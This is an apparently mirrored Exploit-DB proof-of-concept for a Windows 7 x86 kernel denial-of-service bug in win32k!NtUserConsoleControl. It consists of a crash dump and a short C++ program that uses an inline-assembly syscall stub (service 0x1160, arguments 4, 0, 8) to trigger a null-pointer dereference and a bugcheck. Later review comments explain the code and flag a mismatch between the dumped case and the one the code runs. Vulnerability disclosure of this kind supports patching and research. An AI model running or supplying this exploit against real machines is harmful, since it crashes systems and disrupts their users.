Microsoft Windows Kernel – ‘win32k!NtUserConsoleControl’ Denial of Service (PoC)

  • 来源:https://www.exploit-db.com/exploits/45104/
  • /*
    # Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
    # Author: vportal
    # Date: 2018-07-27
    # Vendor homepage: http://www.microsoft.com
    # Version: Windows 7 x86
    # Tested on: Windows 7 x86
    # CVE: N/A
    
    # It is possible to trigger a BSOD caused by a null-pointer dereference when calling the system 
    # call NtUserConsoleControl with the following arguments:
    
    # NtUserConsoleControl(1,0,8).
    # NtUserConsoleControl(4,0,8).
    # NtUserConsoleControl(6,0,12).
    # NtUserConsoleControl(2,0,12).
    # NtUserConsoleControl(3,0,20).
    # NtUserConsoleControl(5,0,8).
    
    # A different crash is reproduced for each case. For the second case the crash is shown below:
    # EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucción en 0x%08lx hace referencia a la memoria 
    # en 0x%08lx. La memoria no se pudo %s.
    # FAULTING_IP:
    # win32k!xxxSetConsoleCaretInfo+c
    # 93310641 8b0e            mov     ecx,dword ptr [esi]
    
    # TRAP_FRAME:8c747b2c -- (.trap 0xffffffff8c747b2c)
    # ErrCode = 00000000
    # eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
    # eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
    # cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010292
    # win32k!xxxSetConsoleCaretInfo+0xc:
    # 93310641 8b0e            mov     ecx,dword ptr [esi]  ds:0023:00000000=????????
    # Resetting default scope
    
    # CUSTOMER_CRASH_COUNT:1
    # DEFAULT_BUCKET_ID:VISTA_DRIVER_FAULT
    # BUGCHECK_STR:0x8E
    # PROCESS_NAME:Win32k-fuzzer_
    
    # CURRENT_IRQL:0
    # LAST_CONTROL_TRANSFER:from 9330fc27 to 93310641
    
    # STACK_TEXT: 
    # 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
    # 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
    # 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
    # 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
    # WARNING: Frame IP not in any known module. Following frames may be wrong.
    # 0016f204 00000000 00000000 00000000 00000000 0x12e6766
    
    # PoC code:
    */
    
    #include <Windows.h>
    
    extern "C"
    
    // Raw 32-bit system-call stub (MSVC x86 inline assembly, Windows only).
    // ApiNumber is the system-service index; the variadic arguments that follow it
    // are handed to the kernel as the service's parameter block:
    //   eax <- ApiNumber                (service index)
    //   edx <- &ApiNumber + 4           (address of the first variadic argument)
    //   int 0x2e                        (legacy x86 system-service interrupt)
    // There is no explicit return statement: the caller receives whatever eax holds
    // after the interrupt — presumably the NTSTATUS of the service — which relies on
    // MSVC leaving eax untouched in the epilogue (compiler-specific, not guaranteed).
    ULONG CDECL SystemCall32(DWORD ApiNumber, ...) 
    {
    __asm{mov eax, ApiNumber};         // service index
    __asm{lea edx, ApiNumber + 4};     // pointer to the arguments after ApiNumber
    __asm{int 0x2e};                   // enter the kernel through the legacy interrupt gate
    }
    
    
    // PoC entry point: issues a single NtUserConsoleControl system call and exits.
    // The argument set (4, 0, 8) is the second of the six cases listed in the header;
    // the trap frame shown above faults on a read through esi=00000000, i.e. the kernel
    // dereferences a NULL pointer taken from these arguments, and the machine bugchecks (0x8E).
    // Note: _tmain and _TCHAR are declared in <tchar.h>, which this file does not include;
    // a Visual Studio console project's precompiled header would normally pull it in.
    int _tmain(int argc, _TCHAR* argv[])
    {
    
    int st = 0;              // status returned by the syscall stub; assigned but never examined
    int syscall_ID = 0x1160; // service index of win32k!NtUserConsoleControl on Windows 7 x86 (per the header);
                             // win32k service indices differ between Windows builds, so this is build-specific
    
    // Presumably loaded so the process becomes a GUI process and the win32k service table is
    // reachable from user mode — the page does not state why; confirm before reusing this stub.
    LoadLibrary(L"user32.dll");
    
    // NOTE(review): the STACK_TEXT in the header shows xxxConsoleControl called with
    // 00000003 00000000 00000014, i.e. the (3, 0, 20) case, while this code issues (4, 0, 8).
    // The dump above may therefore belong to a different case than the one this PoC runs — verify.
    st = (int)SystemCall32(syscall_ID, 4, 0, 8);
    
    return 0;
    }
    
    # The vulnerability has only been tested on Windows 7 x86.